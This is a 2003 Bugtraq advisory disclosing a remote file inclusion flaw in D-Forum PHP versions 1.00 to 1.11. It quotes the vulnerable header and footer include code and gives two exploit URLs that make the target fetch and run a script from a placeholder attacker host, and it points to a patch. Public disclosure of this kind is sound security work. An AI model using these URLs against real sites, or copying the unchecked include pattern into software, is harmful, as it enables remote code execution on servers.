[28923] in bugtraq
D-Forum (PHP)
daemon@ATHENA.MIT.EDU (Frog Man)
Tue Feb 18 11:46:34 2003
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 16 Feb 2003 18:06:15 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F120SuOkx9rW2eUG3QG0000826b@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 -> 1.11
Problem : Include file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/includes/header.php3 :
---------------------------
<?php
if ($my_header!="")
{
include ($my_header);
} else {
?>
...
--------------------------
/includes/footer.php3 :
---------------------------
...
if ($my_footer!="")
{
include ($my_footer);
} else {
?>
...
---------------------------
Exploits :
°°°°°°°°°°
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
or
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
with
http://[attacker]/script.txt
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .
More details :
°°°°°°°°°°°°°°
(in French) http://www.frog-man.org/tutos/5holes8.txt
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://messenger.fr.msn.be
